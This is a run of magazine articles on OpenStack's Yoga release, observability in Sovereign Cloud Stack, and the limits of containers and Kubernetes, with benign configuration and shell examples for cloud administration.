folks behind OpenStack over the past two years and now supports translation to other languages and theming in a far better way. Canonical and Red Hat placed great emphasis on this dashboard: After all, Canonical Ubuntu wants to impress in orange (Figure 3), whereas Red Hat OpenStack accents its interface with red (Figure 4). Functionally, the dashboard in Horizon now has the ability to create and delete quality of service (QoS) rules.
The most important innovation in Yoga for the Nova virtualizer is the ability to pass smart network interface cards (SmartNICs) directly through to a VM by way of network back ends. Traditionally, a software-defined network (SDN) in the OpenStack context works by creating a virtual switch on the host that takes care of packet delivery. However, this approach to processing packets has the major disadvantage that it aggressively hogs the host CPU. For this reason, practically all major network manufacturers are now offering NICs whose chips can process Open vSwitch. Therefore, control over network packet delivery is offloaded from the host to the NICs, where it is handled more efficiently – lifting the load off the host's shoulders.
Previously, Nova could use NICs by selecting the appropriate driver for the emulator in use. Now, however, Nova has a setting on the back end for the virtual network card, so the feature has been standardized and can theoretically be used by any network back-end driver in Nova.
You can see how established OpenStack thinks it has become by looking for Keystone in the OpenStack release highlights. The component is responsible for user and project management and is therefore an absolutely essential feature; however, the developers consider nothing in Yoga relevant enough to warrant a special changelog entry. The developers themselves would probably not call the Keystone feature complete, but the intent is to protect admins against too many changes in Keystone in the foreseeable future.

Kubernetes on the Horizon

Kubernetes on OpenStack (actually Kubernetes on OpenStack on Kubernetes) is a fairly common deployment scenario for the free cloud environment today. Accordingly, it is important to the developers to optimize OpenStack integration with Kubernetes to the best possible extent. More recently, a number of components have been added to OpenStack for this purpose, including Kuryr.
Like OpenStack, Kubernetes is known to come with its own SDN implementation. It used to be quite common to run the virtualized Kubernetes network on top of the OpenStack virtual network – much to the chagrin of many admins, because if anything went wrong in this layer cake, it was difficult or impossible to even guess the source of the problem.
Kuryr remedies this conundrum by creating virtual network ports in OpenStack so that Kubernetes can use them natively and dispense with its own SDN. This solution implicitly enables several features that would otherwise go unused, such as the previously described outsourcing of tasks to NICs, including offloading support, or the seamless integration of as-a-service services from OpenStack in Kubernetes environments.
Octavia, the load balancer as a service, plays a prominent role in the OpenStack universe today but can

Figure 4: The Red Hat OpenStack Platform (RHOP) uses the typical Red Hat look found in other products. © Red Hat
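The QoS rules that Horizon can now create and delete correspond to Neutron's QoS API; a sketch of the CLI equivalent (policy name and bandwidth limit are examples, and defining the function executes nothing):

```shell
# Sketch: create a QoS policy with an egress bandwidth limit - the kind
# of rule now manageable from the Horizon dashboard. Values are examples.
create_bw_limit_policy() {
  local policy="$1" max_kbps="$2"
  openstack network qos policy create "$policy"
  openstack network qos rule create --type bandwidth-limit \
    --max-kbps "$max_kbps" --egress "$policy"
}
```

Attaching such a policy to a port or network then enforces the limit, whether it was created in the dashboard or on the command line.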


only be meaningfully used for Kubernetes if you have Kuryr. In this case, meaningful means without stacking several balancer instances on top of each other.

Across the Board

Many small changes to the various OpenStack services are now occurring across the board. In the past few months, for example, the developers have massively upgraded Designate. DNS as a service is important for many end users because a website hosted on OpenStack also needs to be accessible under a brand name and not just an IP address.
For a long time, however, Designate was only capable of basic functions and, depending on the network back end selected, did not work particularly well. Today, Designate is in good shape, talking to all available SDN back ends and offering a cornucopia of features. For Yoga, the developers have focused on bug and error hunting, expanding their internal testing program and eliminating various bugs. IPv4 and IPv6, distributed name server records, and special forms of DNS records (e.g., TXT lines) have all been offered by Designate for some time. All told – perhaps more than any other OpenStack component – Designate demonstrates that today the platform's focus is on stability and reliability, not just the next big thing.

Paradigm Shift

What OpenStack developers have done recently in terms of OpenStack deployment is almost a paradigm shift of sorts. For a long time, the topic was considered external: Tools based on Ansible, Puppet, or Chef, for example, were good enough to handle OpenStack deployment. This line of reasoning crumbled quite early – at the latest, in OpenStack Ironic.
The service that establishes lifecycle management for hardware of almost any provenance in OpenStack is described as bare metal as a service. Most impressively, Ironic lets you manage OpenStack hosts like OpenStack VMs. TripleO – OpenStack on OpenStack – is the name of the construct in this case. A server running with a base OS alone is more or less meaningless to OpenStack; you need the components for it to count as OpenStack. Although they now all come in the form of containers, you still have to roll them out and configure them.
For this reason, OpenStack-Ansible is now part of OpenStack, although a separate component. It handles tasks in the TripleO context but can be equally well used standalone to get hosts ready for use with OpenStack. That this strict separation between component and deployment from the early days is no longer practiced is good and important. All told, it adds value to the OpenStack deployment.

What Is Not Better

Despite all the praise for the community making the right decisions in the recent past, OpenStack still has elements that don't work reliably or at all. Some of these can be tolerated, but others are very significant.
Today, it is good form for cloud environments to offer as-a-service services to their own user bases. OpenStack has various as-a-service components (e.g., NFS as a service, alias Manila, is well known). However, not everyone who runs a web store is an IT geek with a command line background, so services such as databases need to be accessible to less savvy users. Amazon, for example, is leading the way with its database-as-a-service offering.
OpenStack doesn't seem to be very innovative when it comes to database as a service. Although it already had a component for this service on board, in the form of OpenStack Trove, its development has been idle for more than two years, probably because the last active maintainer has since been poached by a competitor, who deleted the OpenStack topic from the new, joint portfolio shortly afterward. OpenStack users are frustrated and are forced to build their databases manually and painstakingly – if they don't immediately launch their own wild projects, as is the case in many places.
Another aspect of OpenStack that has shown a conspicuous absence of virtually all required features for many years is billing. The Ceilometer component writes user data and stores it in a database called Gnocchi. This component is a pure metric data meter and does not offer any possibility to create invoices with the acquired data.
Granted, OpenStack doesn't make things easy at this point. The complexity of the subject of billing almost implicitly ensures that you need to do more than simply collect data and generate an invoice as a PDF. Instead, it is important to pay attention to various aspects. From the customer's point of view, for example, you need to understand down to the bottom line what you are actually purchasing. If the provider claims on its invoice that a VM ran from 5:35am to 6:35am, it must be able to demonstrate this plausibly in the event of an inquiry. Moreover, various formal requirements apply to invoices, such as the obligation to number them consecutively, the correct disclosure of sales tax depending on the recipient country, and so on. OpenStack developers appear to be reluctant to deal with these details. The premise has always been that OpenStack would not handle billing and would use an external service for this purpose.
For an external service to work efficiently, OpenStack at least needs some sort of generic interface for exporting arbitrary processed data. Many companies rely on proprietary accounting tools, to which OpenStack would then of course have to connect. In practice, however, OpenStack already has a problem providing data for other services. Quite a few approaches were attempted (e.g., CloudKitty, which itself accesses data from Ceilometer); however, none of the solutions has been a resounding success, and to date only proprietary products are cobbled together for specific clouds based on OpenStack.
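To make the billing gap concrete: whatever external service takes over invoicing has to aggregate raw usage samples itself. The CSV layout below is invented purely for illustration; neither Ceilometer nor Gnocchi emits anything this invoice-ready.

```shell
# Sample usage records: project,resource,hours,unit_price (invented layout)
printf '%s\n' \
  'demo,vm-small,24,0.05' \
  'demo,vm-small,12,0.05' \
  'demo,volume-gb,100,0.001' > usage.csv

# Aggregate the samples into one invoice line per project/resource
awk -F, '{ total[$1","$2] += $3 * $4 }
         END { for (k in total) printf "%s,%.2f\n", k, total[k] }' \
  usage.csv | sort > invoice.csv
cat invoice.csv   # e.g. demo,vm-small,1.80
```

Everything beyond this aggregation step – consecutive invoice numbers, per-country sales tax, plausible usage evidence – is exactly the part OpenStack leaves to external tools.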

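Designate's day-to-day use is straightforward by comparison; a sketch of creating a zone plus one of the TXT records mentioned above (zone name and record content are examples, and defining the function executes nothing):

```shell
# Sketch: DNS as a service with Designate's CLI plugin. The zone and the
# record content are examples only.
create_zone_with_txt() {
  local zone="$1"   # absolute name, e.g. "example.com."
  openstack zone create --email "hostmaster@${zone%?}" "$zone"
  openstack recordset create --type TXT \
    --record '"v=spf1 -all"' "$zone" "$zone"
}
```

The same recordset call covers the other record types Designate has offered for some time, such as A, AAAA, and NS records.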
A handful of commercial vendors have added OpenStack to their billing tools, but companies that don't use one of these tools continue to be frustrated. If you want to run OpenStack in a way that makes sense, not only technically but also commercially, you more or less have to build the entire billing system yourself. It is high time for developers to come up with a generic interface that billing service providers can dock onto.

Conclusions

Much achieved, much to do – that is my conclusion with regard to OpenStack after a little more than 12 years of project history. What started life as a cooperation between NASA and Rackspace has become a comprehensive platform for private clouds with high standards.
However, not just OpenStack has changed, but also the industry's take on the project. It is no longer the case that the smallest service providers are trying to join the OpenStack circus, because the solution is now considered a professional tool for large environments. One concern for some is that it has also significantly reduced the number of vendors with OpenStack products in their portfolio. Apart from Canonical and Red Hat, none of the big vendors offer a serious OpenStack distribution.
Resistance is brewing. Kurt Garloff, who is very well connected in the open source and OpenStack scene, has been working for some time on his Sovereign Cloud Stack (SCS) [1], which is based on OpenStack at its core (Figure 5) and is intended to enable data sovereignty by operating in a company's own cloud. (See the article on SCS in this issue.) Garloff has already found some helpers, and the technical development of SCS is certainly something that whets your appetite for more. Competition and diversity don't hurt, so here's hoping SCS can establish itself as an alternative to the big two and help OpenStack gain new momentum.

Info
[1] Sovereign Cloud Stack: [https://scs.community]

The Author
Freelance journalist Martin Gerhard Loschwitz focuses primarily on topics such as OpenStack, Kubernetes, and Chef.

Figure 5: Sovereign Cloud Stack provides a reference architecture for clouds with OpenStack at its core. © Sovereign Cloud Stack

FEATURE Sovereign Cloud Stack

OpenStack observability with Sovereign Cloud Stack

Guard Duty
Operators of an OpenStack environment need to know whether the environment is working and quickly pinpoint
problems. We look at the basics of OpenStack observability in the Sovereign Cloud Stack. By Felix Kronlage-Dammers

The Open Source Business Alliance (OSBA) Sovereign Cloud Stack (SCS) project was launched in 2019 to enable federation-capable cloud environments. In close collaboration between the community and OSBA's SCS team, the project uses an agile approach to create the appropriate standards and a reference implementation. SCS [1] is an open, federation-capable modular cloud and container platform based on open source software. It builds on proven open source components such as OpenStack and Kubernetes in the reference implementation (Figure 1). As a platform, SCS provides the foundations for creating offerings that deliver full digital sovereignty.

Photo by Michaela Filipcikova on Unsplash
Figure 1: Visualization of the relationships between Sovereign Cloud Stack components.

SCS Community

The community comprises a wide variety of cloud service providers


(CSPs) and their employees, people from the OpenStack community, and companies working on deliverables that are awarded through open tenders. Collaboration between the different providers creates a level of cooperation that rarely exists elsewhere. Various teams and special interest groups (SIGs) work together on the topics, coordinating standards and requirements in terms of content. The primary goals of SCS are for teams to take an active part in the respective upstream projects, to be involved in the creation of content, and not to allow a parallel world to develop.
The first such group to be formed out of the Operations and Identity and Access Management team was the Monitoring SIG, which is dedicated to the topics of monitoring and observability.

Observability

Observability does not just mean plain vanilla state analysis (i.e., information on whether or not a service feature is available). Monitoring in line with contemporary standards also includes collecting, storing, and visualizing metrics and aggregating log messages. The overall system enables the operator to get a comprehensive picture of their system to locate problems, their origins, and causes quickly.
In the CSP environment, additional requirements to delete accruing data are based on appropriate specifications. Additionally, for compliance reasons, certain system messages need to be logged or billing data generated from the metrics that occur.

Architecture

When the SIG was founded a year ago, it first collected the requirements of the participating CSPs and contrasted them with the individual components already covered in the reference implementation.
To avoid getting lost in discussions relating only to the tool right from the outset, the first step was to take a tool-agnostic look at the architecture. Figure 2 shows the intended architecture. First, the various roles were defined. The SCS Operator is the system operator (e.g., the CSP), whereas the SCS Integrator describes the companies that assist the operator in setting up and commissioning the system, if needed.
For several reasons, the developers made a deliberate decision to ignore the container layer in the first step and focus instead on the infrastructure-as-a-service (IaaS) layer. On the one hand, this approach reduced complexity and the number of decisions. On the other hand, observability was part of an award package that was not scheduled until 2022. At the IaaS level, the focus is on OpenStack with its various components (Figure 3).
Components and Tools
SCS relies on the Open Source In-
frastructure and Service Manager
(OSISM) [2] as a tool for deploy-
ment and day 2 operations for
OpenStack. OSISM itself relies
heavily on Kolla Ansible [3] and
on OpenStack-Ansible, a collection
of Ansible playbooks for deploying
OpenStack. One of the main focuses
of OSISM is to simplify the opera-
tion of OpenStack-based systems
and, in particular, upgrades from
one OpenStack version to the next.
The goal is to be able to install up-
dates on a system at any time.
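The Kolla Ansible rollout that OSISM builds on happens in phases; a sketch of a typical initial deployment (the inventory path is a placeholder, and defining the function executes nothing):

```shell
# Sketch: the usual Kolla Ansible phases for an initial deployment.
kolla_rollout() {
  local inventory="$1"   # placeholder path to a multinode inventory
  kolla-ansible -i "$inventory" bootstrap-servers  # prepare the hosts
  kolla-ansible -i "$inventory" prechecks          # validate the setup
  kolla-ansible -i "$inventory" deploy             # roll out the containers
}
```

Upgrades follow the same pattern with an upgrade action, which is precisely the workflow OSISM aims to keep painless.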
Figure 2: The tool-agnostic architecture of SCS.
Kolla Ansible comes with a Prometheus-based [4] monitoring stack
out of the box, which coincided
very well with the Monitoring SIG
favoring an OpenMetrics-based ap-
proach from the outset. Initially, the
use of traditional monitoring soft-
ware, such as Zabbix or Icinga for
service state monitoring, was con-
sidered. However, it became clear
relatively quickly in the discussions
that these scenarios could just as
easily be covered by Prometheus’
Figure 3: The IaaS monitoring components of SCS. Blackbox exporter. With a view to
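A service state check with the Blackbox exporter needs little more than a probe module and a matching scrape job; a minimal sketch (the Horizon URL and exporter address are examples):

```shell
# Sketch: Blackbox exporter module plus the matching Prometheus scrape
# job for an HTTP check of a dashboard URL. All values are examples.
cat > blackbox.yml <<'EOF'
modules:
  http_2xx:
    prober: http
    timeout: 5s
EOF

cat > prometheus-scrape.yml <<'EOF'
scrape_configs:
  - job_name: blackbox-horizon
    metrics_path: /probe
    params:
      module: [http_2xx]
    static_configs:
      - targets: ['https://horizon.example.com/']
    relabel_configs:
      # Move the probed URL into the ?target= parameter and point the
      # scrape itself at the exporter.
      - source_labels: [__address__]
        target_label: __param_target
      - source_labels: [__param_target]
        target_label: instance
      - target_label: __address__
        replacement: blackbox-exporter:9115
EOF
```

This is the pattern that lets one exporter replace a standalone state-monitoring system such as Zabbix or Icinga for simple reachability checks.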


reducing complexity, it makes sense to rely on the Blackbox exporter instead of a completely independent software solution. These changes were incorporated into OSISM; Zabbix, which had previously been included, was dropped.
As a first step, additional dashboards were provided for Grafana (Figure 4) and integrated into the Kolla Ansible project. Additionally, various exporters for Prometheus, which are currently not part of Kolla Ansible, should be included.

Alerting

Alerting is an important component in any monitoring setup. It quickly became clear in the Monitoring SIG that every CSP that is not just starting to commission a corresponding environment already has an alerting system in operation. Ideally, the monitoring supplied with SCS would dock onto it.
Therefore, the decision was made to opt for the Prometheus Alert Manager, which is already integrated in Kolla Ansible, and to document best practices [5] for connecting to external alerting systems. The open source Alerta [6] software provides an alternative for aggregating alert occurrences at this point. Initially, the idea of integrating it directly was considered; however, for the time being, Alert Manager was deemed sufficient.
Alert rules are an important part of Prometheus monitoring. To create a good starting point, several rule sets have been adopted from the Awesome alert rules [7] project, and they are now also making their way into Kolla Ansible.

There's Monitoring and Then There's Monitoring

When the talk turns to monitoring, people tend to talk first about simple process monitoring. Does the Foo process exist, and does the Bar service respond on port 42? Often, instead of simply checking whether a service responds on a port, it is a good idea to use test scenarios that carry out a functional check of the service.
For example, in an environment like OpenStack, it's helpful to know whether the Horizon web front end is being delivered correctly to the browser or whether an API should be used to check that VMs can be started. However, checking a network component such as Open Virtual Network (OVN) for correct functionality can become complex. To monitor OVN efficiently, the SIG is currently working on integrating the OVN exporter [8] upstream to provide various OVN metrics for Prometheus. Figure 5 illustrates where the exporter needs to reside to capture data from the redundant components and detect failures.

From Health Monitor to CloudMon

OpenStack Health Monitor is an important component for the SCS project. The program relies on the OpenStack API to cover various scenarios and assess the functionality of an OpenStack cloud from a customer perspective.
The OpenStack Health Monitor periodically installs virtual machines, creates load balancers, and checks the availability of these components. It also logs runtimes so that changes such as delayed provisioning of virtual machines can be tracked. This feature is especially helpful when changes are made to the system environment, such as after an upgrade to OpenStack components, to help identify problems – ideally before end users notice them.
The OpenStack Health Monitor first saw the light of day more than four years ago in the Open Telekom Cloud
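The rule sets adopted from the Awesome alert rules collection are plain Prometheus rule files; a minimal sketch of one (threshold, duration, and labels are examples):

```shell
# Sketch: a Prometheus alert rule file in the style of the rules adopted
# from the Awesome alert rules project. All values are examples.
cat > openstack-alerts.yml <<'EOF'
groups:
  - name: basic
    rules:
      - alert: InstanceDown
        expr: up == 0
        for: 5m
        labels:
          severity: critical
        annotations:
          summary: "Exporter {{ $labels.instance }} is unreachable"
EOF
```

Alert Manager then picks up firing rules like this one and routes them to whatever external alerting system the CSP already runs.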

Figure 4: The Grafana dashboard of the OpenStack Health Monitor.
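A Health Monitor-style check boils down to timed end-to-end provisioning against the public API; a sketch of one cycle (flavor, image, and network names are placeholders, and defining the function executes nothing):

```shell
# Sketch: one Health Monitor-style cycle - create a throwaway VM, log the
# runtime, tear it down again. All names are placeholders.
smoke_test_vm() {
  local name="health-check-$$" start end
  start=$(date +%s)
  openstack server create --flavor m1.tiny --image cirros \
    --network provider --wait "$name"
  end=$(date +%s)
  echo "provisioning took $((end - start))s"   # runtimes are the signal
  openstack server delete --wait "$name"
}
```

Tracking that runtime over many cycles is what surfaces regressions such as slower provisioning after an upgrade.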


(OTC). The project was initiated at the time by Kurt Garloff, who is the current CTO of the SCS project. Colleagues at OTC have since further developed the OpenStack Health Monitor for their environment and presented the resulting APIMon project at the OpenInfra Summit 2020 [9].
Following OpenInfra Summit 2022, APIMon developers met with members of the SCS community to consider how to collaborate on the next iteration. The intent was to develop and maintain an independent successor project, CloudMon, to serve as a reference for behavior-driven monitoring.

Outlook

One of the next priorities for the Monitoring SIG will be to expand log management. Kolla Ansible currently provides a fluentd daemon along with Elasticsearch for log shipping. Especially in terms of compliance requirements in the CSP environment (think audit logging), an installed SCS environment would ideally already include appropriate underpinnings. It would provide SCS operators with best practices for aggregating relevant log messages, such as those relating to attempted logins processed by Keycloak.
The reference implementation of the Sovereign Cloud Stack can be easily put through its paces in the OSISM testbed [10], and it also provides a good introduction to the project. All meetings related to SCS can be viewed on the project website under Contribute to SCS [11]. SCS is currently looking for developers to join the community.

Figure 5: Open Virtual Network setup with Prometheus exporters.

Info
[1] SCS: [https://scs.community/]
[2] OSISM: [https://osism.tech/]
[3] Kolla Ansible: [https://docs.openstack.org/kolla-ansible/latest/]
[4] Prometheus: [https://prometheus.io]
[5] Alertmanager best practices: [https://github.com/SovereignCloudStack/Docs/blob/main/Operational-Docs/integrating-alertmanager.md]
[6] Alerta: [https://alerta.io]
[7] Awesome alert rules: [https://awesome-prometheus-alerts.grep.to]
[8] OVN exporter: [https://github.com/greenpau/ovn_exporter]
[9] Keynote on APIMon: [https://www.youtube.com/watch?v=Em8TfiUlXF4]
[10] OSISM testbed: [https://docs.osism.tech/testbed/]
[11] Contribute to SCS: [https://scs.community/contribute/]

The Author
Felix Kronlage-Dammers has been building open source IT infrastructure since the late 1990s. Between then and now, he was part of various open source development communities, from DarwinPorts to OpenDarwin to OpenBSD and, nowadays, the Sovereign Cloud Stack. His interests range from monitoring and observability over infrastructure as code to building and scaling communities and companies. He has been part of the extended board of the Open Source Business Alliance (OSBA) for six years and describes himself as a Unix/open source nerd. If not working, he is usually found on a road bike.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 23
FEATURE Container Issues

When are Kubernetes and containers not a sensible solution?

Curb Complexity

As the major Linux distributors increasingly lean toward containers, many administrators have come to realize that containers are by no means a panacea for all their problems. By Martin Loschwitz

Containers, Kubernetes, Rancher, OpenShift, Docker, Podman – if you have not yet worked in depth with containers and Kubernetes (aka K8s), you might sometimes get the impression that you have to learn a completely new language. Container-based orchestrated fleets with Kubernetes have clearly proven that they are not a flash in the pan, but all of this omnipresent lauding of containers is getting on the nerves of many. Whichever provider portfolio you assess, it seems that the decisive factor for success is answering a simple question: How do I get my entire portfolio cloud-ready as quickly as possible?

The problems and challenges inherent in containers and K8s are too often forgotten. I address this article to all admins who still view the container hype with a healthy pinch of skepticism. In concrete terms, the question is what are the use cases in which containers do not offer a meaningful alternative to existing or new setups. When does it make more sense to avoid the technical overhead of migration because a particular case will (hardly) benefit from migrating anyway?

Ceph as a Negative Example

If you are in an environment far removed from a greenfield, you can face some disadvantages. Ceph, the distributed object storage solution, is one example. If you believe the vendor Red Hat, containerized deployment is now the best way to roll out Ceph. All of the Ceph components come in the form of individual containers, which cephadm then force-fits on systems.

This arrangement is all well and good, but if you are used to working with Ceph and then try to run a simple ceph -w at the command-line interface (CLI) to discover the cluster status, you are in for a nasty surprise: Command not found is what you will see in response. Logically, if all of the Ceph components are in containers, so are Ceph's CLI tools (Figure 1).

The cephadm shell command does let you access a virtual environment where you can run the appropriate commands, but userland software does not benefit. Programs that need the Librados API for low-level access to the RADOS service, or even depend on /etc/ceph/ceph.conf existing and containing the correct addresses for the MON servers, will not work.

In other words, Red Hat forces you to plumb the depths of containerization, whether you want to or not. Of course, from the manufacturer's point of view, this scenario makes perfect sense. Red Hat only has to maintain one version of Ceph per major release to have executable programs for Red Hat Enterprise Linux in all versions and their derivatives, and even for Ubuntu or SUSE. Wherever a runtime environment for containers is available, these containers will eventually work in an identical way. However, administrators are quite right to resist being told what's best for them.

Containers Are Not Always Needed

Up and down the IT space, vendors promote containers as the universal panacea for all problems. Applications must be cloud-ready; if you still don't rely on containers in your environment, you are – at the very least – behind the times, if not actively blocking innovation.
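To make the Ceph example above concrete, a session on a cephadm-deployed host might look like the following sketch. The hostname is invented and the output is abridged and illustrative; cephadm shell starts a temporary container that contains the familiar CLI tools:

```
[root@node01 ~]# ceph -w
-bash: ceph: command not found
[root@node01 ~]# cephadm shell -- ceph -s
  cluster:
    health: HEALTH_OK
  ...
```

The tools are all still there – just one container boundary away from where a long-time Ceph admin expects them.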
Anyone who hasn't learned the ideal architecture of a Kubernetes cluster by rote must have been asleep for the last 25 years. One fundamental problem with the entire container debate is that the distinction is small between technical strategies that don't necessarily belong together – even if they might complement each other. To begin, you need to distinguish clearly between containerization strategies, as such, and container orchestration. Applications in containers may well have their uses outside of Kubernetes, and not just from a provider perspective; however, if all the terms and descriptions end up in one big pot and are applied arbitrarily, at the end of the day, no one knows what the debate is actually about. Therefore, this article looks at containerization and Kubernetes separately.

Containers Are Practical

Containers are practical in many ways. Time and time again, advocates of the principle argue that the dependency hell of classic package management almost no longer exists with containers. Ultimately, each container doesn't just come with the application itself, but also with the userland, which works autonomously. This setup also makes updating easier. If in doubt, the admin simply stops a running container, checks out the new version of the image, starts it with the old configuration and data, and the job is done.

Containers also initially offer more in terms of security than the established competitors. Under the hood, containers are ultimately no more than a combination of various Linux kernel tools that isolate processes from the rest of the system and from each other. If a vulnerable web server is running in the container and an attacker gains unauthorized access, they will be trapped in the container and not normally be able to get out. This one additional layer of security, at least, is missing in applications without a container layer.

The Security Myth

If you take a closer look, however, the myth of secure containers quickly and decidedly crumbles. As with packages, containers ultimately depend on who their originator is and whether it is a trusted entity.

The popular package managers offered by the major distributors have long since solved this problem. Both RPM and dpkg have mechanisms to establish a chain of trust that is documented right down to the package installed on a system. To this end, most distributors sign their package manager's distribution lists with a digital PGP key. With a signed file, you can then check whether the installed package matches the package listed there (e.g., whether the SHA256 checksums of the individual files match). This way of tracking whether any local changes have been made to the package content is both excellent and compliant.

The situation is quite different in the case of container images. The major vendors also offer ready-made base images, but these images do not typically contain any services. You have two possible courses of action: creating your own environment for continuous integration and continuous deployment (CI/CD), or grabbing ready-made images off the web.

Figure 1: A containerized Ceph presents challenges to those without experience with containers, including not being able to find the familiar tools where they normally hang out.

Complex CI/CD Structure

If you choose the first option of creating your own environment for CI/CD, you inevitably get to use tools like Jenkins or Zuul. The idea behind these tools is that, on the basis of distribution images, CI/CD systems automatically build a new image when a new software version is released and prepare it such that you only have to confirm production deployment by pushing a button. The rollout itself is handled by the CI/CD system, so your workload is kept within narrow limits, because the degree of automation in setups of this type is very high.

The bad news is that if you don't want to buy a ready-made CI/CD system for a large amount of money, you will have to spend time building one. Jenkins and the like are complex tools that can hardly be described as self-explanatory. Much time and effort goes into putting together a CI/CD system that ultimately gives you the same conditions that RPM, dpkg, and other package management systems have provided for decades.

Don't forget updates and how they are handled. You justifiably trust that running apt dist-upgrade on your system will apply all the security updates offered by Canonical or Debian.
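The chain-of-trust check that RPM and dpkg perform can be imitated in miniature with sha256sum. The file names and contents below are illustrative, and a real distributor would additionally sign the manifest with a PGP key:

```shell
# A miniature of the package managers' integrity check: record
# checksums in a manifest, then detect any local change to the files.
rm -rf /tmp/pkgdemo && mkdir -p /tmp/pkgdemo && cd /tmp/pkgdemo
echo "server_tokens off;" > app.conf       # an installed "package file"
sha256sum app.conf > MANIFEST              # the (normally signed) checksum list
sha256sum -c MANIFEST                      # prints: app.conf: OK
echo "backdoor" >> app.conf                # a local, possibly malicious change
sha256sum -c MANIFEST || echo "local change detected"
```

The same verification against a ready-made image from an unknown uploader is simply not possible – there is no trusted manifest to check against.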
However, if you rely on CI/CD, you need to track security updates yourself and replace any affected containers individually rather than collectively.

More Overhead Detours

CI/CD systems are by no means self-perpetuating, then, and in some respects, they even cause more work than legacy package managers. Quite a few admins try to avoid this work and instead resort to ready-made images off the web. Docker Hub is a popular source for such images, but anyone can upload virtually any image there – and in any form.

Although ready-made images are available directly from the manufacturers for popular services such as MariaDB or MongoDB, images of lesser known software can often only be obtained from the community. In many cases, these images do not give you an opportunity to understand how they were built; consequently, you can only guess what is hidden inside.

In the past, several Docker Hub images for various services turned out to be Bitcoin miners in disguise. Other images are uploaded only once and are not maintained by their original authors after the event, and if a security update is due for the program, you are left out in the cold. The use of these black boxes in production operation can therefore only be strongly and categorically advised against. If you use them despite the warnings, you are turning the security advantages of containers into the complete opposite and will end up with significantly less secure systems than would be the case if you used a legacy package manager.

The Myth of Dependency Hell

The dependency hell many admins want to escape by deploying containers is actually a relic of the past (Figure 2). If you only use packages from the manufacturer, from properly maintained backport directories, or (often) from application vendors on your systems, you will rarely face issues at installation and update time because Red Hat, SUSE, Debian, and others have done their homework and today even support cross-version updates (e.g., from Ubuntu 20.04 to Ubuntu 22.04 at Canonical). If you run and are familiar with a defined set of services on your systems, you will reach your objectives far faster with classic packages than with a complete CI/CD environment.

Figure 2: The only systems that fall victim to the notorious dependency hell today are those that use poorly maintained third-party software. © reddit.com/Pablo

Automation is a Good Thing

Automation is necessary, especially for scenarios in which classic automation by Ansible and similar tools plays a significant role. Another advantage that container advocates like to mention is that CI/CD systems offer great automation resources, and systems can be restarted quickly if something goes catastrophically wrong. After all, so the story goes, all you need to do is roll out the container, including the configuration, on another system and start it there again.

Figure 3: Life-cycle managers like Foreman help you get systems back up and running again quickly by reinstalling after a problem. Containers are not needed. © Foreman

Unfortunately, this story ignores the fact that comparable setups might not have containers and instead reside on bare metal. Physical hardware, for example, can easily be managed by
open source software such as Foreman (Figure 3). As the administrator, you then have access to comprehensive life-cycle management features that let you reboot remotely, reinstall, and completely wipe computers. If you can, and want to, commit specifically to one manufacturer, Red Hat (Red Hat Satellite), SUSE (SUSE Manager), and Canonical (Landscape) also have boxed products on the shelf that can be rolled out in a short time.

Besides, today's administrators have a full arsenal of well-developed, perfectly tested automation tools at their disposal. Whether you go for Puppet, Chef, Salt, or Ansible, all of these tools can handle simple tasks, such as installing a service and rolling out a template-based configuration file quickly – without detouring through CI/CD. If a server suffers a hardware failure, a combination of Foreman and Ansible will cleanly reinstall it, along with its required services and their configurations, in a matter of minutes and without any involvement from Docker or Podman. Of course, you have to establish a valid automation story, but even that will be faster and easier than working with Jenkins and the like, in many cases.

More Complicated Handling

Another factor that clearly speaks against containers is something I briefly mentioned at the beginning, but which deserves closer consideration: Containers running on systems are unfamiliar to sys admins in their everyday work and are usually more complex to handle, precisely because the administrator is dealing with the runtime environment for containers. Access to the services is by way of this environment.

Your worries start here. If you use Red Hat Enterprise Linux 8 or one of its clones, you will only be able to access the classic Docker engine by roundabout paths and unofficial sources. Not only can this become a problem in terms of security and compliance, it's something that can really get on your nerves, because Red Hat has long since said goodbye to Docker and is instead going its own way in the form of Podman, assuring you that they are completely compatible with Docker at the command line. In everyday life, however, you will quickly discover that the purported compatibility between Podman and Docker is not great in many places.

If you look at the other vendors, the situation is not much better: The Community Edition of Docker for SUSE, Debian, and Ubuntu might still be available unchanged, but Canonical would prefer its own users to rely on Snap (i.e., Canonical's own format). If you manage systems from Red Hat, Debian, and Canonical, you will have to deal with three different runtime environments, two completely different CLIs, and various compatibility problems.

Confused Debugging

Even if you can exclusively rely on Podman, Docker, or Snap, you will quickly realize in everyday life that containers make many things more complicated. For example, if you want a service running in the container to start automatically at system startup time, you need a systemd init file. However, this file needs to interact with the container management software instead of simply starting the respective service directly.

Speaking of container management, tales of admins desperately trying to find their output on the stdout of their running containers almost sound like urban legends. In Ceph, for example, the OSDs and MONs write their own logfiles, which you will find in /var/lib/ceph/osd/ on the host systems. However, they do not contain the messages directly from the services. If you need these, you can instead tap into the running container with docker logs -f (Figure 4).

Figure 4: If you want to see the error messages generated by containerized Ceph services on stdout, you need to dock directly with the container, instead of accessing a normal logfile.
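For illustration, a minimal systemd unit of the kind just described might look like this for a Podman-managed container. The container name web and the paths are assumptions for the sketch; podman generate systemd can produce more elaborate units of the same shape:

```
# /etc/systemd/system/container-web.service (illustrative sketch)
[Unit]
Description=Containerized web service
Wants=network-online.target
After=network-online.target

[Service]
ExecStart=/usr/bin/podman start --attach web
ExecStop=/usr/bin/podman stop -t 10 web
Restart=on-failure

[Install]
WantedBy=multi-user.target
```

Note that ExecStart does not launch the daemon itself; the unit talks to the container runtime – exactly the indirection criticized above.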
In defense of containers, I have to admit, many of these difficulties can be configured away, but in view of all these factors, the claim that containers work better, faster, more reliably, and more securely than packages out of the box is something I very much doubt.

If you also look at the way services running in containers are connected to the local network, more doubts raise their ugly heads. Because containers are designed out of the box not to be bound to the IP addresses of the host system, Docker and others use port forwarding as a ploy. The containers then open a virtual network on the host, to which the kernel forwards packets for the target IP. Conversely, then, debugging with tools like tcpdump is more complicated than in conventional environments.

Interim Conclusions

No matter how you spin it, containers do have their advantages, but they require the administrator to navigate a huge learning curve, while not solving certain problems as elegantly as can a combination of classic automation and package management. If you have a clear idea of the services you want to run, and on what systems, you will fare better and enjoy more stability from a combination of Ansible, configuration templates, and classic packages from the providers. Most importantly, you will have less complexity than Docker, Podman, and the other container solutions.

Kubernetes: Yes, but …

